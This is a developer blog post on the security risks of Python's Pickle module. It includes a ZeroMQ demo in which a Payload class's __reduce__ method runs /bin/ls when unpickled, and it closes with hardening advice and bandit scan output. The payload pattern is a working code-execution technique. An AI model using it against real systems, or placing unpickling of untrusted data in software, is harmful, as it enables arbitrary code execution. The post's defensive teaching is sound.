If you are familiar with Python, you may have used the Pickle standard library module for object serialization. This module allows a developer to convert a Python object into data that can be transferred over the network, written to a file, or even stored away in a database. When the object is later needed, the Pickle module can convert the serialized data into a regular Python object.

When building distributed systems, a data serialization format can be used to communicate between machines. The Pickle module may be considered ideal, but there are a few security problems that should be known to anyone using this module.

Post written by Travis Cunningham, Software Engineer and Taylor Brazelton, Software Engineer

Python Pickle: Code an Attacker Might Use

In this example, we will use ZeroMQ to send data serialized with Pickle from one Python instance to another.

Client Code (client.py)

import pickle
import zmq

context = zmq.Context()
sock = context.socket(zmq.PULL)

# Receive a message
message = sock.recv()
# Unpickle the data from the socket

Server Code (server.py)

import pickle
import subprocess
import zmq

context = zmq.Context()
sock = context.socket(zmq.PUSH)

class Payload(object):
    """ Executes /bin/ls when unpickled. """
    def __reduce__(self):
        """ Run /bin/ls on the remote machine. """
        return (subprocess.Popen, (('/bin/ls',),))

# Send the payload over the socket

In separate shells, run server.py and client.py:

>> python client.py
client.py server.py

As you can see, the client executed the code that was defined in Payload.__reduce__(). A more advanced attack would involve the attacker gaining remote access to a shell on the target system.

There are valid reasons for running the code in __reduce__ though. Implementing the __reduce__ method in objects provides a way to save the state of objects that were previously difficult to serialize. However, allowing the serialized object to dictate how it should be unserialized could provide attackers with a simple attack vector to execute arbitrary code.

Even if the attacker does not have control of the server, he may have access to the network between the client and the server. In this scenario, the attacker can inject a payload into the communication channel between the two machines.

Python Pickle Security Best Practices

  • If possible, encrypt the network connection between the machines communicating pickled data. This will prevent modification of pickled data. Using SSL/TLS to encrypt network connections between systems is very common and effective in preventing attackers from tampering with network traffic.
  • If network connection encryption is not possible, use a digital signature to maintain data integrity and ensure network traffic is not altered in transit.
  • If pickled data is stored to a disk, ensure strict file permissions are applied to prevent someone from modifying the pickled data.
  • Since it is easy to execute arbitrary code when unpickling data, it may be best to avoid using the Pickle module. Avoiding the module will also prevent other developers from introducing security problems into your application. If you need to use a data serialization format, consider using JSON or Google Protocol Buffers.

Python Pickle: Security Risk & Alternative

At SmartFile, we use Google Protocol Buffers for communication between software systems and view Python Pickle as a security risk. As a security measure, we disallow usage of the Pickle module in all of our software dependencies.

Become a Better DevOps Pro

Start our free DevOps course and get lessons on ranging from Docker to Agile.

Start Your Course

How Can I Find Pickle Usage in My Code?

To check your code base for usage of a Pickle, you can use bandit, a security linter from the OpenStack Security Group. This tool will help you find common security problems in Python code. It is also useful to check your project dependencies for usage of Pickle.

Install Bandit

> pip install bandit

Run Analysis

> bandit -r .
[bandit]	INFO	using config: /home/travis/venv/etc/bandit/bandit.yaml
[bandit]	INFO	running on Python 2.7.10
Run started:
	2015-11-06 22:32:03.032735

Run metrics:
	Total lines of code: 33
	Total lines skipped (#nosec): 0
	Total issues (by severity):
		Undefined: 0
		Low: 4
		Medium: 1
		High: 0
	Total issues (by confidence):
		Undefined: 0
		Low: 0
		Medium: 0
		High: 5

Files skipped (0):

Test results:

>> Issue: [blacklist_imports] Consider possible security implications associated with pickle module.

   Severity: Low   Confidence: High
   Location: ./client.py:1
1	import pickle
2	import zmq

>> Issue: [blacklist_calls] Pickle library appears to be in use, possible security issue.

   Severity: Medium   Confidence: High
   Location: ./client.py:9
8	message= sock.recv()
9	pickle.loads(message)

>> Issue: [blacklist_imports] Consider possible security implications associated with pickle module.

   Severity: Low   Confidence: High
   Location: ./server.py:1
1	import pickle
2	import subprocess
3	import zmq

>> Issue: [blacklist_imports] Consider possible security implications associated with subprocess module.

   Severity: Low   Confidence: High
   Location: ./server.py:2
1	import pickle
2	import subprocess
3	import zmq

Adding bandit to your Continuous Integration service (such as Jenkins or Travis CI) can help prevent team members from introducing potential security problems.


Get our free DevOps course delivered straight to your inbox! You’ll learn these tactics:

  • Docker Tips and Tricks
  • Agile Methodologies
  • Documentation and Tools Hacks
  • Containerization vs Virtualization

These DevOps lessons will help your team collaborate and become more agile, so sign up now!

Related Posts

Related Topics & Tags: API / Platform Industry Thoughts

About Travis Cunningham

Software Engineer. Loves community and open source.

Leave a Reply

Your email address will not be published. Required fields are marked *